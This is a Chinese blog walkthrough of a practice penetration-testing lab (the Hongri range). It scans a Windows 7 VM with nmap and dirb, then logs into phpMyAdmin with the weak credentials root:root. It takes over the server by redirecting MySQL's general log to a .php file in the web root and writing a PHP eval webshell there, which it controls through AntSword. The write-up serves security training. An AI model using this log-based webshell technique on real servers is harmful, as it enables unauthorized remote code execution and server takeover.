【渗透测试】-红日靶场-获取web服务器权限

拓扑图:

前置环境配置:

Win 7

默认密码:hongrisec@201

内网ip:192.168.52.143

打开虚拟网络编辑器

添加网络->VMent1->仅主机模式->子网ip:192.168.145.0

添加网卡:

虚拟机->设置-> 添加->网络适配器

保存,打开win 7并重启:

查看ip地址:

外网ip: Ip:192.168.145.129

内网ip: Ip:192.168.52.143

进入C:\phpstudy,启动

渗透测试:

方法一:phpadmin

打开kali,ip:192.168.145.128

存活主机探测

命令:nmap -sn 192.168.145.0/24

全端口扫描

命令:nmap -A -p 1-65535 192.168.145.129

80端口-> 开放 http服务

3306端口->开放 mysql服务

目录扫描

命令:dirb http://192.168.145.129

http://192.168.145.129/phpmyadmin/

登录验证:

192.168.145.129:80

泄露:

路径:C:/phpStudy/WWW

使用弱口令进行数据库连接:

root:root

http://192.168.145.129/phpmyadmin/

登录->sql。

第一步 查询日志 命令: show variables like '%general%';

发现日志写入系统关闭,需要打开。

命令: set global general_log='on';

开启成功。

在C:/phpStudy/WWW/2.php路径下写入一句话木马:

set global general_log_file = 'C:/phpStudy/WWW/2.php'

select '<?php @eval($_POST["cmd"]);?>'

验证:http://192.168.145.129/2.php

使用中国蚁剑连接成功。

拿到服务器主机权限。

相关推荐
风吹落叶花飘荡5 分钟前
从零开始的 vue项目部署到服务器详细步骤(vue项目build打包+nginx部署+配置ssl证书)
服务器·vue.js·nginx
很楠不爱7 分钟前
Qt——信号和槽
服务器·数据库·qt
神技圈子11 分钟前
【linux经典工具】作为一个合格的开发人员怎能不会tmux
linux·运维·服务器
龙萱坤诺13 分钟前
AI自动评论插件V1.3 WordPress插件 自动化评论插件
运维·人工智能·自动化
weixin_4483505013 分钟前
探索自动化数据清洗技术的前沿趋势
大数据·运维·自动化·数据治理·数据提取
Bold!23 分钟前
最新ubuntu22.04 下列软件包有未满足的依赖关系 解决方案
linux·运维·服务器
xy.Ren26 分钟前
【C++】`->` 符号
网络·c++
pyliumy44 分钟前
docker的安装配置与基本简单命令
运维·docker·容器
itachi-uchiha1 小时前
Linux特种文件系统--tmpfs文件系统
linux·运维·服务器
木子Linux1 小时前
【补补漏洞吧】等保测评OpenSSH漏洞补漏方法
网络·安全·ssh·bash·xlnet